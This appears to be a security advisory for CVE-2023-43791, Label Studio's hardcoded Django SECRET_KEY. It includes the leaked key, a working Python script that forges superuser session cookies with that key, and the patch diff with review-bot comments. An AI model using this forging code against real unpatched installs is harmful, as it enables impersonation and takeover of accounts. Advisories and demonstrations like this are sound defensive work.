VYPR
Critical severity · NVD Advisory · Published Nov 9, 2023 · Updated Sep 3, 2024

Label Studio has Hardcoded Django `SECRET_KEY` that can be Abused to Forge Session Tokens

CVE-2023-43791

Description

Label Studio is a multi-type data labeling and annotation tool with a standardized output format. Versions before 1.8.2 ship with a hardcoded Django `SECRET_KEY` in `label_studio/core/settings/base.py`, so every installation that does not override it signs its sessions and tokens with the same publicly known key. Because that key is all Django needs to produce a valid signature, an attacker who knows it can forge session tokens; chained with the ORM leak vulnerability, this lets an attacker impersonate any account and escalate from a low-privileged user to a Django superuser. Version 1.8.2 introduces a patch that generates a per-install key when none is configured.
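How a known `SECRET_KEY` turns into a forged login, as an added example that is not part of this advisory, of Label Studio or of Django: the script below re-implements the relevant slice of Django 3.2's `django.core.signing` (sha256 salted HMAC, stripped URL-safe base64, base62 timestamp) with the standard library so it runs without Django installed, mints a session cookie for a superuser with the key removed in the patch, and shows that the same cookie is rejected once the key is rotated. It assumes the signed-cookie session backend (`django.contrib.sessions.backends.signed_cookies`); the user id, backend name and password hash in the payload are constructed. The key alone produces valid signatures, but to be accepted as a particular account the payload also needs `_auth_user_hash`, an HMAC over that account's current password hash, so the key has to be combined with some way of obtaining that hash.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib

# The key every pre-1.8.2 install shared: the literal removed in the patch.
LEAKED_SECRET_KEY = '$(fefwefwef13;LFK{P!)@#*!)kdsjfWF2l+i5e3t(8a1n'

# Salts used by Django's signed-cookie session backend and its auth layer.
SESSION_SALT = 'django.contrib.sessions.backends.signed_cookies'
AUTH_HASH_SALT = 'django.contrib.auth.models.AbstractBaseUser.get_session_auth_hash'
DEFAULT_MAX_AGE = 14 * 24 * 3600  # Django's SESSION_COOKIE_AGE default
B62 = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'


def b64_encode(raw):
    # URL-safe base64 with '=' padding stripped, as django.core.signing does.
    return base64.urlsafe_b64encode(raw).strip(b'=').decode()


def b64_decode(text):
    return base64.urlsafe_b64decode(text + '=' * (-len(text) % 4))


def b62_encode(n):
    # Timestamp encoding used by TimestampSigner.
    out = ''
    while True:
        n, r = divmod(n, 62)
        out = B62[r] + out
        if n == 0:
            return out


def b62_decode(text):
    n = 0
    for ch in text:
        n = n * 62 + B62.index(ch)
    return n


def salted_hmac(key_salt, value, secret):
    # Django's salted_hmac (sha256): HMAC key = sha256(salt || SECRET_KEY).
    # Holding SECRET_KEY therefore yields every per-purpose key.
    key = hashlib.sha256(key_salt.encode() + secret.encode()).digest()
    return hmac.new(key, value.encode(), hashlib.sha256)


def signature(value, secret, salt):
    # Signer.signature(): the key salt is salt + 'signer'.
    return b64_encode(salted_hmac(salt + 'signer', value, secret).digest())


def session_auth_hash(password_hash, secret):
    # AbstractBaseUser.get_session_auth_hash(): binds a session to the
    # account's current password hash and is checked on every request.
    return salted_hmac(AUTH_HASH_SALT, password_hash, secret).hexdigest()


def forge_session_cookie(session, secret, timestamp=None):
    # Mirrors signing.dumps(session, salt=SESSION_SALT, compress=True):
    # compact JSON, zlib if it helps ('.' prefix), base62 timestamp, signature.
    payload = json.dumps(session, separators=(',', ':')).encode('latin-1')
    compressed = zlib.compress(payload)
    body = '.' + b64_encode(compressed) if len(compressed) < len(payload) - 1 else b64_encode(payload)
    value = f'{body}:{b62_encode(int(time.time()) if timestamp is None else timestamp)}'
    return f'{value}:{signature(value, secret, SESSION_SALT)}'


def verify_session_cookie(cookie, secret, max_age=DEFAULT_MAX_AGE, now=None):
    # Server-side acceptance: constant-time MAC check, age check, then decode.
    parts = cookie.split(':')
    if len(parts) != 3:
        return None
    body, ts, sig = parts
    if not (sig.isascii() and ts and all(ch in B62 for ch in ts)):
        return None
    if not hmac.compare_digest(sig, signature(f'{body}:{ts}', secret, SESSION_SALT)):
        return None
    if (int(time.time()) if now is None else now) - b62_decode(ts) > max_age:
        return None
    try:
        raw = zlib.decompress(b64_decode(body[1:])) if body.startswith('.') else b64_decode(body)
        return json.loads(raw.decode('latin-1'))
    except (ValueError, zlib.error):
        return None


def superuser_session(password_hash, secret, user_id='1'):
    # Constructed payload: the three keys django.contrib.auth.login() stores.
    return {
        '_auth_user_id': user_id,
        '_auth_user_backend': 'django.contrib.auth.backends.ModelBackend',
        '_auth_user_hash': session_auth_hash(password_hash, secret),
    }


if __name__ == '__main__':
    # Constructed victim data: superuser pk 1 with a made-up pbkdf2 hash string.
    victim_hash = 'pbkdf2_sha256$260000$constructedsalt$constructedhash'
    cookie = forge_session_cookie(superuser_session(victim_hash, LEAKED_SECRET_KEY), LEAKED_SECRET_KEY)
    print('forged sessionid:', cookie)
    print('accepted with leaked key:', verify_session_cookie(cookie, LEAKED_SECRET_KEY) is not None)
    print('accepted after key rotation:', verify_session_cookie(cookie, 'fresh-random-key') is not None)
```

With a server-side session store (the database or cache backends) a minted cookie is not enough on its own, because the cookie then only carries a session id; the same key still signs password-reset tokens, `signing.dumps` payloads and anything else built on `Signer`, which is why giving each install its own key, as the patch does, matters regardless of the session backend.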

Affected packages

Versions sourced from the GitHub Security Advisory.

Package        Ecosystem   Affected versions   Patched versions
label-studio   PyPI        < 1.8.2             1.8.2

Patches

3d06c5131c15

fix: LSDV-5071: Ensure secret key is securely set persisting a new one if required (#4690)

4 files changed · +29 −2
  • deploy/requirements.txt (+1 −0, modified)
    @@ -25,6 +25,7 @@ Django==3.2.20
     django-storages==1.12.3
     django_annoying==0.10.6
     django_debug_toolbar==3.2.1
    +django-environ==0.10.0
     django_filter==2.4.0
     django_model_utils==4.1.1
     django_rq==2.5.1
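Review bot: `django-environ` is pinned only in `deploy/requirements.txt`, yet `label_studio/core/utils/params.py` now does `import environ` at module import time, so any install that takes its dependencies from the package's declared install requirements rather than this file will fail at startup with an ImportError. Add the same `django-environ==0.10.0` pin to the package metadata (and to any other requirements files the repository carries) in this commit rather than a follow-up.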
    
  • label_studio/core/settings/base.py (+2 −2, modified)
    @@ -74,7 +74,7 @@
     if not logging.getLogger().hasHandlers():
         logging.basicConfig(level=logging.DEBUG, format='%(message)s')
     
    -from label_studio.core.utils.io import get_data_dir
    +from label_studio.core.utils.io import get_data_dir, generate_key_if_missing
     from label_studio.core.utils.params import get_bool_env, get_env, get_env_list_int
     
     logger = logging.getLogger(__name__)
    @@ -105,7 +105,7 @@
     INTERNAL_PORT = '8080'
     
     # SECURITY WARNING: keep the secret key used in production secret!
    -SECRET_KEY = '$(fefwefwef13;LFK{P!)@#*!)kdsjfWF2l+i5e3t(8a1n'
    +SECRET_KEY = generate_key_if_missing('SECRET_KEY')
     
     # SECURITY WARNING: don't run with debug turned on in production!
     DEBUG = get_bool_env('DEBUG', True)
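Review bot: swapping the literal for `generate_key_if_missing('SECRET_KEY')` means every deployment that was running on the default key gets a fresh one on upgrade, which invalidates all existing sessions and signed tokens; that needs a release note, together with a warning that the removed literal `'$(fefwefwef13;LFK{P!)@#*!)kdsjfWF2l+i5e3t(8a1n'` is now public and must never be put back through the `SECRET_KEY` environment variable. Since this is the only `SECRET_KEY` line in the diff, please also confirm no other settings module in the tree still carries the literal. (`DEBUG = get_bool_env('DEBUG', True)` two lines below defaults debug mode to on; out of scope for this fix, but worth its own ticket.)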
    
  • label_studio/core/utils/io.py (+19 −0, modified)
    @@ -1,4 +1,5 @@
     """This file and its contents are licensed under the Apache License 2.0. Please see the included NOTICE for copyright information and LICENSE for a copy of the license.
    +
     """
     import os
     import socket
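Review bot: the only change in this hunk is a blank line appended inside the license docstring; drop it, it is noise in the diff and in the module's `__doc__`.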
    @@ -16,6 +17,8 @@
     from tempfile import mkstemp, mkdtemp
     
     from django.conf import settings
    +from django.core.management.utils import get_random_secret_key
    +from label_studio.core.utils.params import env, env_file
     from appdirs import user_config_dir, user_data_dir, user_cache_dir
     
     # full path import results in unit test failures
    @@ -208,3 +211,19 @@ def validate_upload_url(url, block_local_urls=True):
             if ipaddress.ip_address(ip) in ipaddress.ip_network(subnet):
                 raise InvalidUploadUrlError
     
    +def generate_key_if_missing(key):
    +    value = env.str(key, "")
    +
    +    if value == "":
    +        print(f'Warning: {key} not found in environment variables will generate a random key.')
    +        value = get_random_secret_key()
    +        try:
    +            with open(env_file, 'a') as f:
    +                f.write(f'\n{key}={value}\n')
    +        except Exception as e:
    +            print(f'Warning: failed to write {key} to .env file: {e}, new key will be regenerated on every server restart. If this key is used for signing, it will invalidate all existing sessions or tokens. Please set {key} in your environment variables to avoid this warning.')
    +
    +        os.environ[key] = value
    +
    +    return value
    +
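Review bot: `open(env_file, 'a')` creates the `.env` file with the process umask (typically 0644), so the freshly generated SECRET_KEY lands in a world-readable file; create it with `os.open(env_file, os.O_WRONLY | os.O_CREAT | os.O_APPEND, 0o600)` or `os.chmod(env_file, 0o600)` after writing. A second problem is the read-back path: `get_random_secret_key()` draws from punctuation that includes `$` (the removed literal in `base.py` itself starts with `$(`), and django-environ treats a value that begins with `$` as a reference to another variable, so on the next restart such a key reads back as the `""` default, a second key gets appended, and every session signed with the first one dies. Reading with `os.environ.get(key, "")` instead of `env.str(key, "")` avoids that, since `read_env` already populates `os.environ`. Also send the two warnings through `logger` rather than `print`, and narrow `except Exception` to `OSError`, which is the failure the message describes.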
    
  • label_studio/core/utils/params.py (+7 −0, modified)
    @@ -1,7 +1,14 @@
     import os
    +import environ
    +
     from rest_framework.exceptions import ValidationError
     
     
    +env = environ.Env()
    +data_dir = os.environ.get('LABEL_STUDIO_DATA_DIR', os.path.join(os.path.dirname(__file__), '..', '..', '..', 'data'))
    +env_file = os.path.join(data_dir, '.env')
    +environ.Env.read_env(env_file)
    +
     def cast_bool_from_str(value):
         if isinstance(value, str):
             if value.lower() in ['true', 'yes', 'on', '1']:
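Review bot: `data_dir` is resolved here from `LABEL_STUDIO_DATA_DIR` with a fallback to `../../../data` relative to this file, independently of the `get_data_dir()` in `label_studio/core/utils/io.py` that `base.py` already imports; if the two disagree, the generated key is persisted into the source tree instead of the runtime data directory, and a container that does not mount that path regenerates the key on every restart. Reuse the same resolution and create the directory before `read_env`, because `open(env_file, 'a')` in `generate_key_if_missing` cannot create missing parent directories and that failure is swallowed by its broad `except`. `environ.Env.read_env(env_file)` also runs as an import side effect, so whatever `.env` contains is fixed in `os.environ` the moment anything imports `params`; a comment making that ordering explicit would save the next reader a surprise.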
    
